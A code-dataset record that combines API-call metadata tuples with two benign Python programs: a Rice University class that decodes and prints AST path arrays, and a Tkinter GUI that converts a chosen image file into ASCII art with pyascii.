'rospy.is_shutdown', 'rp.is_shutdown', ([], {}), '()\n', (2146, 2148), True, 'import rospy as rp\n'), ((4024, 4034), 'styx_msgs.msg.Waypoint', 'Waypoint', ([], {}), '()\n', (4032, 4034), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((4767, 4777), 'styx_msgs.msg.Waypoint', 'Waypoint', ([], {}), '()\n', (4775, 4777), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((6016, 6032), 'numpy.array', 'np.array', (['[x, y]'], {}), '([x, y])\n', (6024, 6032), True, 'import numpy as np\n'), ((6668, 6693), 'scipy.spatial.KDTree', 'KDTree', (['self.waypoints_2d'], {}), '(self.waypoints_2d)\n', (6674, 6693), False, 'from scipy.spatial import KDTree\n'), ((7468, 7533), 'math.sqrt', 'math.sqrt', (['((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2)'], {}), '((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2)\n', (7477, 7533), True, 'import math as math\n'), ((7799, 7850), 'rospy.logerr', 'rp.logerr', (['"""Could not start waypoint updater node."""'], {}), "('Could not start waypoint updater node.')\n", (7808, 7850), True, 'import rospy as rp\n')] |
# Copyright 2017 Rice University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from program_helper.ast.ops import DAPIInvoke
from synthesis.ops.candidate_ast import SYMTAB_MOD, TYPE_NODE, API_NODE, VAR_NODE, OP_NODE, METHOD_NODE, CLSTYPE_NODE, \
VAR_DECL_NODE
class AstReverseMapper:
    """Accumulates flattened AST path arrays and decodes them back to tokens.

    Eight parallel lists hold one entry per AST node; `vocab` supplies the
    reverse dictionaries (chars_concept, chars_var, chars_type, chars_api,
    chars_op, chars_method) used to pretty-print a stored program.
    """

    def __init__(self, vocab):
        self.vocab = vocab
        # All per-node storage is initialized in reset() so the constructor
        # and reset() cannot drift apart.
        self.reset()

    def add_data(self, nodes, edges, targets,
                 var_decl_ids,
                 node_type_number,
                 type_helper_val, expr_type_val, ret_type_val):
        """Append one program's parallel path arrays to the accumulated data."""
        self.nodes.extend(nodes)
        self.edges.extend(edges)
        self.targets.extend(targets)
        self.var_decl_ids.extend(var_decl_ids)
        self.node_type_numbers.extend(node_type_number)
        self.type_helper_val.extend(type_helper_val)
        self.expr_type_val.extend(expr_type_val)
        self.ret_type_val.extend(ret_type_val)
        self.num_data += len(nodes)

    def get_element(self, id):
        """Return the 8-tuple of parallel entries stored at index `id`."""
        return self.nodes[id], self.edges[id], self.targets[id], \
               self.var_decl_ids[id], \
               self.node_type_numbers[id], \
               self.type_helper_val[id], self.expr_type_val[id], self.ret_type_val[id]

    def decode_ast_paths(self, ast_element, partial=True):
        """Pretty-print one element's nodes, edges and decoded targets.

        With partial=False the symbol-table helper arrays (variable decl ids
        and the three type columns) are printed as well.
        """
        nodes, edges, targets, \
            var_decl_ids, \
            node_type_numbers, \
            type_helper_vals, expr_type_vals, ret_type_vals = ast_element

        for node in nodes:
            print(self.vocab.chars_concept[node], end=',')
        print()

        for edge in edges:
            print(edge, end=',')
        print()

        # Decode each target according to its node type, since each node type
        # indexes a different vocabulary table. The loop variable is named
        # node_type (singular) so it no longer shadows the unpacked list above.
        for _, _, target, \
            var_decl_id, \
            node_type, \
            type_helper_val, expr_type_val, ret_type_val in zip(*ast_element):
            if node_type == SYMTAB_MOD:
                print('--symtab--', end=',')
            elif node_type == VAR_NODE:
                print(self.vocab.chars_var[target], end=',')
            elif node_type == VAR_DECL_NODE:
                print(self.vocab.chars_var[target], end=',')
            elif node_type == TYPE_NODE:
                print(self.vocab.chars_type[target], end=',')
            elif node_type == CLSTYPE_NODE:
                print(self.vocab.chars_type[target], end=',')
            elif node_type == API_NODE:
                # Only the first part of a delimited API invocation is shown.
                api = self.vocab.chars_api[target]
                api = api.split(DAPIInvoke.delimiter())[0]
                print(api, end=',')
            elif node_type == OP_NODE:
                op = self.vocab.chars_op[target]
                print(op, end=',')
            elif node_type == METHOD_NODE:
                op = self.vocab.chars_method[target]
                print(op, end=',')
            else:
                print(self.vocab.chars_concept[target], end=',')
        print()

        if not partial:
            for var_decl_id in var_decl_ids:
                print(var_decl_id, end=',')
            print()
            for type_helper_val in type_helper_vals:
                print(self.vocab.chars_type[type_helper_val], end=',')
            print()
            for expr_type_val in expr_type_vals:
                print(self.vocab.chars_type[expr_type_val], end=',')
            print()
            for ret_type_val in ret_type_vals:
                print(self.vocab.chars_type[ret_type_val], end=',')
            print()
        print()

    def reset(self):
        """Clear all accumulated path data (the vocabulary is kept)."""
        self.nodes, self.edges, self.targets = [], [], []
        self.var_decl_ids = []
        self.node_type_numbers = []
        self.type_helper_val, self.expr_type_val, self.ret_type_val = [], [], []
        self.num_data = 0
"program_helper.ast.ops.DAPIInvoke.delimiter"
] | [((3184, 3206), 'program_helper.ast.ops.DAPIInvoke.delimiter', 'DAPIInvoke.delimiter', ([], {}), '()\n', (3204, 3206), False, 'from program_helper.ast.ops import DAPIInvoke\n')] |
from tkinter import *
from tkinter import filedialog
from pyascii import main
class App:
    """Tkinter front-end for pyascii: pick an image file and convert it to an
    ASCII-art text file saved next to the image."""

    # Image extensions accepted by the converter (compared case-sensitively,
    # matching the original behaviour).
    VALID_EXTENSIONS = ("jpeg", "jpg", "bmp", "png")

    def __init__(self, master):
        """Build the widget tree inside *master* (the Tk root window)."""
        # Path of the image chosen by the user; None until a file is picked.
        self.myFile = None
        self.saveFile = None
        # set minimum window size
        master.minsize(height = 440, width = 680)
        # container frame
        frame = Frame(master)
        frame.pack()
        # instruction label
        self.labelTop = Label(frame, text="Choose an image file!", font=("Arial", 12))
        self.labelTop.pack()
        # file-chooser button
        self.buttonTop = Button(frame, text="Choose file", fg="blue", width = 10, command = self.chooseImageFile)
        self.buttonTop.pack()
        # output-location hint
        self.labelMid = Label(frame,
                              text="The ascii text file will be saved in the same directory as the image.\n"
                                   "If your image name was foo.jpg, the text file will be foo.txt",
                              font=("Arial", 12))
        self.labelMid.pack()
        # conversion button
        self.buttonMid = Button(frame, text="Pyascii!", fg="green", width = 10, command=self.pyascii)
        self.buttonMid.pack()

    def chooseImageFile(self):
        """Prompt for an image file, re-prompting until a supported type is picked.

        NOTE(review): cancelling the dialog returns '' which never validates,
        so cancelling keeps re-opening the dialog — unchanged from the
        original behaviour.
        """
        self.myFile = filedialog.askopenfilename(parent = root, title='Choose your picture!')
        while not self.verifyFileExtension():
            self.myFile = filedialog.askopenfilename(parent = root, title='Invalid file!')

    def pyascii(self):
        """Run the ASCII conversion on the chosen image.

        Guard added: clicking "Pyascii!" before a valid image was chosen used
        to call main(None) and crash; such clicks are now ignored.
        """
        if self.verifyFileExtension():
            main(self.myFile)

    def verifyFileExtension(self):
        """Return True if a file is chosen and carries a supported extension."""
        if self.myFile is None:
            return False
        # str.endswith accepts a tuple of suffixes, replacing the manual flag loop.
        return self.myFile.endswith(self.VALID_EXTENSIONS)
# Application bootstrap: build the Tk root window, attach the App controller
# and enter the blocking event loop (returns when the window is closed).
root=Tk()
root.wm_title("Pyascii")
app = App(root)
root.mainloop()
"pyascii.main",
"tkinter.filedialog.askopenfilename"
] | [((1046, 1115), 'tkinter.filedialog.askopenfilename', 'filedialog.askopenfilename', ([], {'parent': 'root', 'title': '"""Choose your picture!"""'}), "(parent=root, title='Choose your picture!')\n", (1072, 1115), False, 'from tkinter import filedialog\n'), ((1285, 1302), 'pyascii.main', 'main', (['self.myFile'], {}), '(self.myFile)\n', (1289, 1302), False, 'from pyascii import main\n'), ((1184, 1246), 'tkinter.filedialog.askopenfilename', 'filedialog.askopenfilename', ([], {'parent': 'root', 'title': '"""Invalid file!"""'}), "(parent=root, title='Invalid file!')\n", (1210, 1246), False, 'from tkinter import filedialog\n')] |